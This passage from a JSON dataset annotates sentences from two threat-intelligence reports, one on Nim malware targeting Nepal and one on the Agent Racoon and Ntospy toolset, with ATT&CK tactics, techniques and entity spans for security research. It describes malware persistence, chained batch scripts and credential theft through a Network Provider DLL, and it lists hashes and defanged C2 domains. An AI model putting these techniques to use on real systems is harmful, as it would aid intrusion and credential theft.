{ "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "The malware sends execution results back to the command and control server.", "entities": [ { "text": "sent back to the server", "start": 29, "end": 52, "label": "Action" } ] }, { "uid": "aptnotes-14_aptnotes_report-p8-s46-712b50", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 8, "sentence_id": 46, "context_before": "The execution result is also sent back to the server through a GET request.", "sentence_text": "The key used for encryption and decryption is “NPA”, which may be an abbreviation of NP (Nepal) Agent.\n8/12", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p9-s47-cddae9", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 9, "sentence_id": 47, "context_before": "The key used for encryption and decryption is “NPA”, which may be an abbreviation of NP (Nepal) Agent.\n8/12", "sentence_text": "Screenshot of network traffic specific to the sample.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p9-s48-a317f6", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 9, "sentence_id": 48, "context_before": "Screenshot of network traffic specific to the sample.", "sentence_text": "The sample contacts the following C2 hosts:\nmail[.]mofa[.]govnp[.]org\nnitc[.]govnp[.]org\nmx1[.]nepal[.]govnp[.]org\ndns[.]govnp[.]org\nPersistence through Startup Folder and Scheduled Task To retain access on the machine, a VBscript named “OCu3HBg7gyI9aUaB.vbs” is placed in the startup folder.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "The malware places a VBScript in the startup folder to maintain persistence.", "entities": [ { "text": "is placed in the startup folder", "start": 260, "end": 291, "label": "Action" }, { "text": "OCu3HBg7gyI9aUaB.vbs", "start": 238, "end": 258, "label": "MalwareTool" } ] }, { "uid": "aptnotes-14_aptnotes_report-p9-s49-2ef1b0", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 9, "sentence_id": 49, "context_before": "The sample contacts the following C2 hosts:\nmail[.]mofa[.]govnp[.]org\nnitc[.]govnp[.]org\nmx1[.]nepal[.]govnp[.]org\ndns[.]govnp[.]org\nPersistence through Startup Folder and Scheduled Task To retain access on the machine, a VBscript named “OCu3HBg7gyI9aUaB.vbs” is placed in the startup folder.", "sentence_text": "The script will initially confirm an internet connection using WMI’s “Win32_PingStatus” class to ping https://www.google[.]com.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p9-s50-086950", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 9, "sentence_id": 50, "context_before": "The script will initially confirm an internet connection using WMI’s “Win32_PingStatus” class to ping https://www.google[.]com.", "sentence_text": "If successful, it will run a batch file named “8lGghf8kIPIuu3cM.bat”.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "run batch file 8lGghf8kIPIuu3cM.bat", "entities": [ { "text": "8lGghf8kIPIuu3cM.bat", "start": 47, "end": 67, "label": "MalwareTool" }, { "text": "run a batch file", "start": 23, "end": 39, "label": "Action" } ] }, { "uid": "aptnotes-14_aptnotes_report-p9-s51-c86aca", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 9, "sentence_id": 51, "context_before": "If successful, it will run a batch file named “8lGghf8kIPIuu3cM.bat”.", "sentence_text": "The main task of the batch file “8lGghf8kIPIuu3cM.bat” is to drop files that will further unpack and create a scheduled task for the payload.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task/Job: Scheduled Task" } ], "procedure": "Drop additional files that unpack payload components and create a scheduled task to maintain persistence.", "entities": [ { "text": "the batch file “8lGghf8kIPIuu3cM.bat”", "start": 17, "end": 54, "label": "MalwareTool" }, { "text": "drop files", "start": 61, "end": 71, "label": "Action" }, { "text": "further unpack", "start": 82, "end": 96, "label": "Action" }, { "text": "create a scheduled task for the payload", "start": 101, "end": 140, "label": "Action" }, { "text": "scheduled task", "start": 110, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "the payload", "start": 129, "end": 140, "label": "MalwareTool" } ] }, { "uid": "aptnotes-14_aptnotes_report-p9-s52-a03617", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 9, "sentence_id": 52, "context_before": "The main task of the batch file “8lGghf8kIPIuu3cM.bat” is to drop files that will further unpack and create a scheduled task for the payload.", "sentence_text": "The batch file will create more scripts that will carry out these subtasks:\nunz.vbs is used for decompressing the executable out from the archive into the same directory unzFile.vbs creates unz.vbs 2L7uuZQboJBhTERK.bat is just for chaining; runs unzFile.vbs then runs 2BYretPBD4iSQKYS.bat 2BYretPBD4iSQKYS.bat is just for chaining; runs unz.vbs then runs d.bat d.bat creates a scheduled task of the unpacked payload (conhost.exe) then runs e.bat e.bat deletes itself and the other scripts created by 8lGghf8kIPIuu3cM.bat 9/12", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task/Job: Scheduled Task" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Create multiple scripts to decompress payloads, chain execution steps, establish persistence via a scheduled task, and remove artifacts by deleting scripts.", "entities": [ { "text": "The batch file", "start": 0, "end": 14, "label": "MalwareTool" }, { "text": "create more scripts", "start": 20, "end": 39, "label": "Action" }, { "text": "decompressing the executable out from the archive", "start": 96, "end": 145, "label": "Action" }, { "text": "runs unzFile.vbs", "start": 241, "end": 257, "label": "Action" }, { "text": "runs 2BYretPBD4iSQKYS.bat", "start": 263, "end": 288, "label": "Action" }, { "text": "runs unz.vbs", "start": 332, "end": 344, "label": "Action" }, { "text": "runs d.bat", "start": 350, "end": 360, "label": "Action" }, { "text": "creates a scheduled task of the unpacked payload (conhost.exe)", "start": 367, "end": 429, "label": "Action" }, { "text": "runs e.bat", "start": 435, "end": 445, "label": "Action" }, { "text": "deletes itself and the other scripts", "start": 452, "end": 488, "label": "Action" }, { "text": "conhost.exe", "start": 417, "end": 428, "label": "MalwareTool" }, { "text": "scheduled task", "start": 377, "end": 391, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-14_aptnotes_report-p10-s53-f99bdf", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 10, "sentence_id": 53, "context_before": "The batch file will create more scripts that will carry out these subtasks:\nunz.vbs is used for decompressing the executable out from the archive into the same directory unzFile.vbs creates unz.vbs 2L7uuZQboJBhTERK.bat is just for chaining; runs unzFile.vbs then runs 2BYretPBD4iSQKYS.bat 2BYretPBD4iSQKYS.bat is just for chaining; runs unz.vbs then runs d.bat d.bat creates a scheduled task of the unpacked payload (conhost.exe) then runs e.bat e.bat deletes itself and the other scripts created by 8lGghf8kIPIuu3cM.bat 9/12", "sentence_text": "The batch file named “d.bat” creates a scheduled task to attain another persistent execution of the malware on the target machine.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "creates a scheduled task for persistent execution of malware", "entities": [ { "text": "d.bat", "start": 22, "end": 27, "label": "MalwareTool" }, { "text": "creates a scheduled task", "start": 29, "end": 53, "label": "Action" } ] }, { "uid": "aptnotes-14_aptnotes_report-p10-s54-db7dd4", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 10, "sentence_id": 54, "context_before": "The batch file named “d.bat” creates a scheduled task to attain another persistent execution of the malware on the target machine.", "sentence_text": "The scheduled task is named “ConsoleHostManager” as seen in the below screenshot.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p10-s55-5993bc", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 10, "sentence_id": 55, "context_before": "The scheduled task is named “ConsoleHostManager” as seen in the below screenshot.", "sentence_text": "Screenshot for Scheduled Task created.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p10-s56-affa7b", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 10, "sentence_id": 56, "context_before": "Screenshot for Scheduled Task created.", "sentence_text": "Netskope Detection\nNetskope Advanced Threat Protection provides proactive coverage against zero-day and APT samples of malicious Office documents using both our static analysis engines and cloud sandbox.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p10-s57-af4c73", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 10, "sentence_id": 57, "context_before": "Netskope Detection\nNetskope Advanced Threat Protection provides proactive coverage against zero-day and APT samples of malicious Office documents using both our static analysis engines and cloud sandbox.", "sentence_text": "The following screenshot shows the detection for e2a3edc708016316477228de885f0c39, indicating it was detected by Netskope Cloud Sandbox, Netskope Advanced Heuristic Engine, and Netskope Threat Intelligence.\n10/12", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p11-s58-2a6cde", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 11, "sentence_id": 58, "context_before": "The following screenshot shows the detection for e2a3edc708016316477228de885f0c39, indicating it was detected by Netskope Cloud Sandbox, Netskope Advanced Heuristic Engine, and Netskope Threat Intelligence.\n10/12", "sentence_text": "Conclusions\nMalware written in uncommon programming languages puts the security community at a disadvantage as researchers and reverse engineers’ unfamiliarity can hamper their investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p11-s59-47ff36", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 11, "sentence_id": 59, "context_before": "Conclusions\nMalware written in uncommon programming languages puts the security community at a disadvantage as researchers and reverse engineers’ unfamiliarity can hamper their investigation.", "sentence_text": "Nim is one of the young programming languages increasingly abused by malware authors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p11-s60-fc1c48", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 11, "sentence_id": 60, "context_before": "Nim is one of the young programming languages increasingly abused by malware authors.", "sentence_text": "Aside from its familiar syntax, its cross-compilation features allow attackers to write one malware variant and have it cross-compiled to target different platforms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p11-s61-ecc5ad", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 11, "sentence_id": 61, "context_before": "Aside from its familiar syntax, its cross-compilation features allow attackers to write one malware variant and have it cross-compiled to target different platforms.", "sentence_text": "Netskope Threat Labs will continue monitoring the usage of unpopular programming languages.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p11-s62-3bc6ef", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 11, "sentence_id": 62, "context_before": "Netskope Threat Labs will continue monitoring the usage of unpopular programming languages.", "sentence_text": "IOCs\nMD5\ne2a3edc708016316477228de885f0c39\n777fcc34fef4a16b2276e420c5fb3a73\nEF834A7C726294CE8B0416826E659BAA\n32C5141B0704609B9404EFF6C18B47BF\nSHA-1\n3aa803baf5027c57ec65eb9b47daad595ba80bac\n5D2E2336BB8F268606C9C8961BED03270150CF65\n4CAE7160386782C02A3B68E7A9BA78CC5FFB0236\n0599969CA8B35BB258797AEE45FBD9013E57C133\nSHA-256\nb5c001cbcd72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6e\n696f57d0987b2edefcadecd0eca524cca3be9ce64a54994be13eab7bc71b1a83\n11/12", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p12-s63-ebc4f1", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 12, "sentence_id": 63, "context_before": "IOCs\nMD5\ne2a3edc708016316477228de885f0c39\n777fcc34fef4a16b2276e420c5fb3a73\nEF834A7C726294CE8B0416826E659BAA\n32C5141B0704609B9404EFF6C18B47BF\nSHA-1\n3aa803baf5027c57ec65eb9b47daad595ba80bac\n5D2E2336BB8F268606C9C8961BED03270150CF65\n4CAE7160386782C02A3B68E7A9BA78CC5FFB0236\n0599969CA8B35BB258797AEE45FBD9013E57C133\nSHA-256\nb5c001cbcd72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6e\n696f57d0987b2edefcadecd0eca524cca3be9ce64a54994be13eab7bc71b1a83\n11/12", "sentence_text": "88FA16EC5420883A9C9E4F952634494D95F06F426E0A600A8114F69A6127347F\n1246356D78D47CE73E22CC253C47F739C4F766FF1E7B473D5E658BA1F0FDD662\nNetwork\nmail[.]mofa[.]govnp[.]org\nnitc[.]govnp[.]org\nmx1[.]nepal[.]govnp[.]org\ndns[.]govnp[.]org\nThank you to Juan Diego Huet for helping analyze the sample files and contributing to this blog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p12-s64-efe62f", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 12, "sentence_id": 64, "context_before": "88FA16EC5420883A9C9E4F952634494D95F06F426E0A600A8114F69A6127347F\n1246356D78D47CE73E22CC253C47F739C4F766FF1E7B473D5E658BA1F0FDD662\nNetwork\nmail[.]mofa[.]govnp[.]org\nnitc[.]govnp[.]org\nmx1[.]nepal[.]govnp[.]org\ndns[.]govnp[.]org\nThank you to Juan Diego Huet for helping analyze the sample files and contributing to this blog.", "sentence_text": "Ghanashyam Satpathy\nGhanashyam Satpathy is a Principal Researcher with the Netskope Efficacy team, which drives the detection effectiveness.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-14_aptnotes_report-p12-s65-fa06e8", "source": "aptnotes", "doc_id": "14_aptnotes_report", "page_number": 12, "sentence_id": 65, "context_before": "Ghanashyam Satpathy\nGhanashyam Satpathy is a Principal Researcher with the Netskope Efficacy team, which drives the detection effectiveness.", "sentence_text": "His background is building threat detection products using AI/ML technology for cloud and endpoint security.\n12/12", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p1-s1-99a581", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "New Tool Set Found Used Against Organizations in the Middle East, Africa and the US unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa Chema Garcia December 1, 2023", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p1-s2-1b2368", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "New Tool Set Found Used Against Organizations in the Middle East, Africa and the US unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa Chema Garcia December 1, 2023", "sentence_text": "We will discuss a set of tools used in the course of the attacks that reveal clues about the threat actors’ activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p1-s3-00d8a6", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "We will discuss a set of tools used in the course of the attacks that reveal clues about the threat actors’ activity.", "sentence_text": "We are sharing this research to provide detection, prevention and hunting recommendations to help organizations strengthen their overall security posture.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p1-s4-07762a", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "We are sharing this research to provide detection, prevention and hunting recommendations to help organizations strengthen their overall security posture.", "sentence_text": "These tools were used to perform the following activities:\nEstablish backdoor capabilities For command and control (C2)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p1-s5-4772e4", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "These tools were used to perform the following activities:\nEstablish backdoor capabilities For command and control (C2)", "sentence_text": "Steal user credentials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p1-s6-baa43f", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "Steal user credentials.", "sentence_text": "Exfiltrate confidential information tools observed here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p1-s7-066829", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "Exfiltrate confidential information tools observed here.", "sentence_text": "We assess with medium confidence that this threat activity cluster aligns to nation-state related threat actors due to the nature of the organizations that were compromised, the TTPs observed and the customization of the tool set.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p1-s8-a3a6aa", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "We assess with medium confidence that this threat activity cluster aligns to nation-state related threat actors due to the nature of the organizations that were compromised, the TTPs observed and the customization of the tool set.", "sentence_text": "We have not confirmed a particular nation- state or threat group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p1-s9-cf46e8", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "We have not confirmed a particular nation- state or threat group.", "sentence_text": "Tools that were used in this cluster were the following:\n1/22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p2-s10-c4a877", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 2, "sentence_id": 10, "context_before": "Tools that were used in this cluster were the following:\n1/22", "sentence_text": "A new backdoor we’ve named Agent Racoon This malware family is written using the .NET framework and leverages the domain name service (DNS) protocol to create a covert channel and provide different backdoor functionalities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p2-s11-026564", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 2, "sentence_id": 11, "context_before": "A new backdoor we’ve named Agent Racoon This malware family is written using the .NET framework and leverages the domain name service (DNS) protocol to create a covert channel and provide different backdoor functionalities.", "sentence_text": "Threat actors have used this along with the other two tools in multiple attacks targeting organizations across the U.S., Middle East and Africa.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p2-s12-186423", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "Threat actors have used this along with the other two tools in multiple attacks targeting organizations across the U.S., Middle East and Africa.", "sentence_text": "Its C2 infrastructure dates back to 2020.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p2-s13-9d107c", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "Its C2 infrastructure dates back to 2020.", "sentence_text": "A new tool we’ve named Ntospy This malware is a Network Provider DLL module designed to steal user credentials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p2-s14-ccd88c", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "A new tool we’ve named Ntospy This malware is a Network Provider DLL module designed to steal user credentials.", "sentence_text": "A customized version of Mimikatz called Mimilite", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p2-s15-a6505f", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "A customized version of Mimikatz called Mimilite", "sentence_text": "The compromised organizations belong to the following industries:\nEducation\nReal estate\nRetail\nNon-profit organizations\nTelecom companies\nGovernments\nBased on unique similarities in tools as well as tactics, techniques and procedures (TTPs), we are tracking this threat activity cluster as CL-STA-0002.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p2-s16-24c0b2", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "The compromised organizations belong to the following industries:\nEducation\nReal estate\nRetail\nNon-profit organizations\nTelecom companies\nGovernments\nBased on unique similarities in tools as well as tactics, techniques and procedures (TTPs), we are tracking this threat activity cluster as CL-STA-0002.", "sentence_text": "What follows is a detailed description of the activity we observed as well as characteristics of the tool set.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p2-s17-dcbb26", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "What follows is a detailed description of the activity we observed as well as characteristics of the tool set.", "sentence_text": "well as Advanced URL Filtering, DNS Security and Advanced Wildfire.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p2-s18-f1511d", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "well as Advanced URL Filtering, DNS Security and Advanced Wildfire.", "sentence_text": "Organizations can engage the Unit 42 Incident Response team for specific assistance with this threat and others.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p2-s19-75ade3", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "Organizations can engage the Unit 42 Incident Response team for specific assistance with this threat and others.", "sentence_text": "Related Unit 42 Topics DNS, Mimikatz, Backdoor Table of Contents Activity Summary Gaining Access to Credentials with Ntospy Credentials Dumping Through Mimilite Agent Racoon Backdoor Data Exfiltration Conclusion Indicators of Compromise Additional Resources 2/22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p3-s20-23d5dd", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 3, "sentence_id": 20, "context_before": "Related Unit 42 Topics DNS, Mimikatz, Backdoor Table of Contents Activity Summary Gaining Access to Credentials with Ntospy Credentials Dumping Through Mimilite Agent Racoon Backdoor Data Exfiltration Conclusion Indicators of Compromise Additional Resources 2/22", "sentence_text": "Activity Summary\nThe threat actor used temporary directories such as C:\\Windows\\Temp and C:\\Temp to deploy specific components of their tool set across the different affected organizations.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "The attacker deploys malware components using temporary directories on the system.", "entities": [ { "text": "used temporary directories such as C:\\Windows\\Temp and C:\\Temp to deploy specific components", "start": 34, "end": 126, "label": "Action" }, { "text": "C:\\Windows\\Temp", "start": 69, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "C:\\Temp", "start": 89, "end": 96, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-15_aptnotes_report-p3-s21-df5baf", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 3, "sentence_id": 21, "context_before": "Activity Summary\nThe threat actor used temporary directories such as C:\\Windows\\Temp and C:\\Temp to deploy specific components of their tool set across the different affected organizations.", "sentence_text": "They used the following similar filenames for batch and PowerShell scripts:\nc:\\windows\\temp\\crs.ps1\nc:\\windows\\temp\\ebat.bat\nc:\\windows\\temp\\install.bat\nc:\\windows\\temp\\mslb.ps1\nc:\\windows\\temp\\pb.ps1\nc:\\windows\\temp\\pb1.ps1\nc:\\windows\\temp\\pscan.ps1\nc:\\windows\\temp\\set_time.bat\nc:\\windows\\temp\\usr.ps1\nWhile the attackers commonly used Ntospy across the affected organizations, the Mimilite tool and the Agent Racoon malware have only been found in nonprofit and government- related organizations’ environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p3-s22-f2ce69", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 3, "sentence_id": 22, "context_before": "They used the following similar filenames for batch and PowerShell scripts:\nc:\\windows\\temp\\crs.ps1\nc:\\windows\\temp\\ebat.bat\nc:\\windows\\temp\\install.bat\nc:\\windows\\temp\\mslb.ps1\nc:\\windows\\temp\\pb.ps1\nc:\\windows\\temp\\pb1.ps1\nc:\\windows\\temp\\pscan.ps1\nc:\\windows\\temp\\set_time.bat\nc:\\windows\\temp\\usr.ps1\nWhile the attackers commonly used Ntospy across the affected organizations, the Mimilite tool and the Agent Racoon malware have only been found in nonprofit and government- related organizations’ environments.", "sentence_text": "After each attack session, the threat actor leveraged cleanmgr.exe to clean up the environment used during the session.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Threat actor uses cleanmgr.exe to remove artifacts and clean the compromised environment after each attack session", "entities": [ { "text": "the threat actor", "start": 27, "end": 43, "label": "ThreatActor" }, { "text": "cleanmgr.exe", "start": 54, "end": 66, "label": "MalwareTool" }, { "text": "leveraged cleanmgr.exe to clean up the environment used during the session", "start": 44, "end": 118, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p3-s23-8174ea", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 3, "sentence_id": 23, "context_before": "After each attack session, the threat actor leveraged cleanmgr.exe to clean up the environment used during the session.", "sentence_text": "Gaining Access to Credentials with Ntospy To perform credential theft, the threat actor used a custom DLL module implementing a Network Provider.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1556", "name": "Modify Authentication Process" } ], "procedure": "Use a custom DLL implementing a Network Provider to intercept and steal credentials.", "entities": [ { "text": "the threat actor", "start": 71, "end": 87, "label": "ThreatActor" }, { "text": "used a custom DLL module implementing a Network Provider", "start": 88, "end": 144, "label": "Action" }, { "text": "Ntospy", "start": 35, "end": 41, "label": "MalwareTool" }, { "text": "custom DLL module", "start": 95, "end": 112, "label": "MalwareTool" } ] }, { "uid": "aptnotes-15_aptnotes_report-p3-s24-217395", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 3, "sentence_id": 24, "context_before": "Gaining Access to Credentials with Ntospy To perform credential theft, the threat actor used a custom DLL module implementing a Network Provider.", "sentence_text": "A Network Provider module is a DLL component implementing the interface provided by Microsoft to support additional types of network protocols during the authentication process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p3-s25-3db90e", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 3, "sentence_id": 25, "context_before": "A Network Provider module is a DLL component implementing the interface provided by Microsoft to support additional types of network protocols during the authentication process.", "sentence_text": "This technique is pretty well documented.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p3-s26-a84606", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 3, "sentence_id": 26, "context_before": "This technique is pretty well documented.", "sentence_text": "Sergey Polak demonstrated the technique at BlackHat back in 2004 at his session titled “Capturing Windows Passwords using the Network Provider API.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p3-s27-4fe2e2", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 3, "sentence_id": 27, "context_before": "Sergey Polak demonstrated the technique at BlackHat back in 2004 at his session titled “Capturing Windows Passwords using the Network Provider API.”", "sentence_text": "The threat actor registers the Ntospy DLL module as a Network Provider module to hijack the authentication process, to get access to the user credentials every time the victim attempts to authenticate to the system.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" }, { "id": "T1556", "name": "Modify Authentication Process" } ], "procedure": "Threat actor registers Ntospy DLL as a Network Provider to hijack authentication and capture user credentials", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "Ntospy DLL module", "start": 31, "end": 48, "label": "MalwareTool" }, { "text": "registers the Ntospy DLL module as a Network Provider module to hijack the authentication process, to get access to the user credentials every time the victim attempts to authenticate to the system", "start": 17, "end": 214, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p3-s28-dc4455", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 3, "sentence_id": 28, "context_before": "The threat actor registers the Ntospy DLL module as a Network Provider module to hijack the authentication process, to get access to the user credentials every time the victim attempts to authenticate to the system.", "sentence_text": "process to load the malicious DLL module in an MS Exchange Server environment.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1556", "name": "Modify Authentication Process" } ], "procedure": "The attacker registers a malicious DLL to hijack authentication and capture credentials.", "entities": [ { "text": "load the malicious DLL module", "start": 11, "end": 40, "label": "Action" }, { "text": "malicious DLL module", "start": 20, "end": 40, "label": "MalwareTool" } ] }, { "uid": "aptnotes-15_aptnotes_report-p4-s31-639151", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 4, "sentence_id": 31, "context_before": "environment.", "sentence_text": "The threat actor’s implementation of this technique has some 